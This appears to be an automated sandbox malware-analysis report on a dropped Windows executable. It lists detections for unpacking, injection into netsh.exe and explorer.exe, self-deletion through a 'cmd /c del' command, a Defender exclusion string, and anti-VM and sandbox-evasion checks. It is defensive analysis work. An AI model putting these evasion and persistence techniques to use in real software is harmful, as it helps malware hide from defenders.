          Source: triage_dropped_file.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: triage_dropped_file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\mNyEIdHepa\src\obj\Debug\UCOMITypeL.pdb source: triage_dropped_file.exe
          Source: Binary string: netsh.pdb source: triage_dropped_file.exe, 00000005.00000002.364321923.0000000003460000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: triage_dropped_file.exe, 00000005.00000002.363232393.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, triage_dropped_file.exe, 00000005.00000002.363443966.000000000160F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000015.00000002.507374686.0000000003210000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000015.00000002.507739154.000000000332F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: triage_dropped_file.exe, 00000005.00000002.364321923.0000000003460000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: triage_dropped_file.exe, 00000005.00000002.363232393.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, triage_dropped_file.exe, 00000005.00000002.363443966.000000000160F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000015.00000002.507374686.0000000003210000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000015.00000002.507739154.000000000332F000.00000040.00000800.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: triage_dropped_file.exe, Main.cs.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.triage_dropped_file.exe.ea0000.0.unpack, Main.cs.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.2.triage_dropped_file.exe.ea0000.0.unpack, Main.cs.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.2.triage_dropped_file.exe.9a0000.1.unpack, Main.cs.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.triage_dropped_file.exe.9a0000.2.unpack, Main.cs.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.triage_dropped_file.exe.9a0000.3.unpack, Main.cs.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.triage_dropped_file.exe.9a0000.5.unpack, Main.cs.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.triage_dropped_file.exe.9a0000.9.unpack, Main.cs.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.triage_dropped_file.exe.9a0000.1.unpack, Main.cs.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.triage_dropped_file.exe.9a0000.7.unpack, Main.cs.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.triage_dropped_file.exe.9a0000.0.unpack, Main.cs.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_0041F074 push 0000003Ah; retf
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_0041783E push 5B3B22F0h; retf
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_0041EA3B push E33F23DFh; ret
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_00416B72 push eax; retf
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_0041EC07 push 2AB056CEh; ret
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_0041D4C5 push eax; ret
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_0041ECC6 push 2AB056CEh; ret
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_0041654F push esp; iretd
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_0041D57C push eax; ret
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_0041D512 push eax; ret
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_0041D51B push eax; ret
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_00416FF0 push edi; retf
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_0041A785 push esi; iretd
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0328D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0099783E push 5B3B22F0h; retf
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0099F074 push 0000003Ah; retf
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0099EA3B push E33F23DFh; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_00996B72 push eax; retf
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0099D4C5 push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0099ECC6 push 2AB056CEh; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0099EC07 push 2AB056CEh; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0099D51B push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0099D512 push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0099654F push esp; iretd
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0099D57C push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0099A785 push esi; iretd
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_00996FF0 push edi; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.82226086578

          Hooking and other Techniques for Hiding and Protection

          barindex
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: /c del "C:\Users\user\Desktop\triage_dropped_file.exe"
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: /c del "C:\Users\user\Desktop\triage_dropped_file.exe"
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: 0.2.triage_dropped_file.exe.32b9d84.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.triage_dropped_file.exe.323d3bc.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.284884958.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.285346164.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: triage_dropped_file.exe PID: 3428, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: triage_dropped_file.exe, 00000000.00000002.284884958.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, triage_dropped_file.exe, 00000000.00000002.285346164.00000000032A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: triage_dropped_file.exe, 00000000.00000002.284884958.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, triage_dropped_file.exe, 00000000.00000002.285346164.00000000032A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\triage_dropped_file.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\triage_dropped_file.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000000989904 second address: 000000000098990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000000989B7E second address: 0000000000989B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\triage_dropped_file.exe TID: 2900Thread sleep time: -39332s >= -30000s
          Source: C:\Users\user\Desktop\triage_dropped_file.exe TID: 1388Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\triage_dropped_file.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\netsh.exeAPI coverage: 7.4 %
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeThread delayed: delay time: 39332
          Source: C:\Users\user\Desktop\triage_dropped_file.exeThread delayed: delay time: 922337203685477
          Source: triage_dropped_file.exe, 00000000.00000002.285346164.00000000032A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 0000000C.00000000.296251998.000000000891C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: triage_dropped_file.exe, 00000000.00000002.285346164.00000000032A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000C.00000000.321089896.0000000003710000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: triage_dropped_file.exe, 00000000.00000002.285346164.00000000032A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000000C.00000000.304861001.0000000003767000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 0000000C.00000000.348408544.00000000011B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 0000000C.00000000.313661366.00000000089B5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 0000000C.00000000.321983274.00000000053C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 0000000C.00000000.313661366.00000000089B5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: triage_dropped_file.exe, 00000000.00000002.285346164.00000000032A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\netsh.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0323DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03263B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03263B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0323DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03308B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0323F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03264BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03264BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03264BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03305BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03241B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03241B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032ED380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03262397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03274A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03274A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03248A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03235210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03235210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03235210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03235210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0323AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0323AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03253A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03308A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0327927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03239240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03239240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03239240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03239240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032FEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032C4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0324AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0324AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03262AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03262ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03254120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03254120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03254120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03254120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03254120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03239100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03239100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03239100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0323C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0323B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0323B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032599BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032599BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032599BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032599BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032599BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032599BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032599BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032599BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032599BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032599BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032599BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032599BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03262990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0323B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0323B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0323B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032C41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0324B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0324B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0324B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0324B02A mov eax, dword ptr fs:[00000030h]
